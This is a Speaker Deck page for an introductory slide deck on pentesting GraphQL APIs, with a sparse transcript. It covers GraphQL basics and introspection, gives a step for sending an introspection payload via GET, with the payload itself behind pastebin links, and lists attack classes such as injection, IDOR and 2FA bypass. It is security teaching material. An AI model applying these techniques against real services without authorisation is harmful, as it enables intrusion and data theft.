Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Pentesting GraphQL APIs
Search
Arun
July 17, 2020
Technology
0
180
Pentesting GraphQL APIs
Arun
July 17, 2020
Tweet
Share
More Decks by Arun
See All by Arun
Offensive-GraphQL-API-Exploitation
hehacks
1
290
OWASP DevSlop
hehacks
0
18
Android Pentesting For Beginners - RE & Static Code Analysis
hehacks
0
87
iOS Pentesting for Beginners
hehacks
1
25
Metasploit Database Usage
hehacks
0
18
Other Decks in Technology
See All in Technology
.NET 9 のパフォーマンス改善
nenonaninu
0
990
re:Invent 2024 Innovation Talks(NET201)で語られた大切なこと
shotashiratori
0
310
5分でわかるDuckDB
chanyou0311
10
3.2k
C++26 エラー性動作
faithandbrave
2
750
新機能VPCリソースエンドポイント機能検証から得られた考察
duelist2020jp
0
220
ハイテク休憩
sat
PRO
2
160
Amazon SageMaker Unified Studio(Preview)、Lakehouse と Amazon S3 Tables
ishikawa_satoru
0
160
なぜCodeceptJSを選んだか
goataka
0
160
GitHub Copilot のテクニック集/GitHub Copilot Techniques
rayuron
37
14k
小学3年生夏休みの自由研究「夏休みに Copilot で遊んでみた」
taichinakamura
0
160
Snykで始めるセキュリティ担当者とSREと開発者が楽になる脆弱性対応 / Getting started with Snyk Vulnerability Response
yamaguchitk333
2
190
AWS re:Invent 2024で発表された コードを書く開発者向け機能について
maruto
0
190
Featured
See All Featured
Code Reviewing Like a Champion
maltzj
520
39k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
RailsConf 2023
tenderlove
29
940
Thoughts on Productivity
jonyablonski
67
4.4k
Building a Modern Day E-commerce SEO Strategy
aleyda
38
7k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
Designing for Performance
lara
604
68k
VelocityConf: Rendering Performance Case Studies
addyosmani
326
24k
Testing 201, or: Great Expectations
jmmastey
40
7.1k
The Cult of Friendly URLs
andyhume
78
6.1k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
247
1.3M
Transcript
None
None
graphql { GraphQL GraphQL Architecture REST Vs GraphQL GraphQL Schema
Introspection Query GraphQL Vulnerabilities Pentesting Tools GraphQL in Action !!! }
None
None
None
None
None
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
None
None
• Query – For Retrieving data/Results, similar to GET in
REST. • Mutation – For Modifications Like POST/PUT/DELETE Operations. • Subscriptions – For Events/Realtime Updates. GraphQL Schema Subscriptions (Type) - EVENTS Mutations (Type) - WRITE Query (Type) - READ
None
None
Change the POST request into GET Request. Append the payload
on the Endpoint URL from below link https://pastebin.com/QyNaXVKg https://pastebin.com/dFdsTaDQ
None
SQL Injection NoSQL Injection Access Control Related Issues. Mass Assignment
IDOR Bypassing 2FA/BruteForce Attacks. DOS Attacks etc.,
None
None
None
None
None
None
None
None
None